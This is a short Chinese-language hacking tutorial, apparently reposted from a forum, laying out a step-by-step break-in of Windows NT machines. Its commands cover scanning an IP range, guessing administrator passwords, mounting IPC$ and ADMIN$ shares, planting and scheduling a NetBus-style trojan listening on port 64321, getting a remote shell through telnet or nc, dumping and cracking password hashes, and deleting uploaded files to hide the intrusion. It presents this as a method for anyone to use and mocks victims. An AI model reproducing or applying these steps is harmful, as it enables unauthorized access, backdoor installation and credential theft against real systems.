| 关键词: nbsp 64321 NTSRV EXE L0PHTCRACK SCHEDULE IP PWDDUMP LETMEIN 监听 |
1 本方法要有以下几个工具:PINGER;LETMEIN;NTSRV;NETSVC;PWDDUMP;NC;L0PHTCRACK 2 开始,用PINGER查一个IP段,找到目标,并选定 3 进入DOS,利用LETMEIN C:\>LETMEIN \\IP -ADMIN -D MYPWD 探测该网站的USER和PASSWD,如没有,试其它网站,你总会找到几个笨蛋的,我们这里以USER=KAWE PASSWD=KAWEN为准 4 进入IPC连接 C:\>NET USE \\IP\IPC$ :KAWEN" /USER:"KAWEN" 5 进去后,COPY工具进去 NTSRV;NETSVC;PWDDUMP 方法:COPY C:\HACK2\NTSRV.EXE \\IP\ADMIN$\SYSTEM32 6 启动木马程序(NESRV.EXE)并监听64321端口. C:\>NETSVC \\IP SCHEDULE /START (启动SCHEDULE) C:\>AT \\IP 13:00 NTSRV.EXE /PORT:64321 |NOMSG (SCHEDULE启动NTSRV.EXE并监听64321) 7.成功.启动木马客户端(NETBUS)在HOSTNAME/IP中填入IP,在PORT中填入64321,选CONNECT. 8选项GETINFO 会反回一个消息,可以看到NT在对方的C盘中的WINNT 9 选APPREDIRECT,我们要利用它的CMD.EXE,弹出的窗口填入 C:\>C:\WINNT\SYSTEM32\CMD.EXE PORT:64321 10 我们可以利用TELNET和NC二种方式来控制 TELNET IP 64321 NC IP 64321 并用NET VIEW看共享 11 在TELNET或 NC方式中运行PWDDUMP.EXE,利用NETBUS将SERVER.LC拉下来,并用L0PHTCRACK来解密 C:\>WINNT>SYSTEM32>PWDDUMMP >SERVER.LC 用L0PHTCRACK解密码 12 得到PASSWD做什么随便你,别忘了X掉你上传到他机子上的FILE. |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|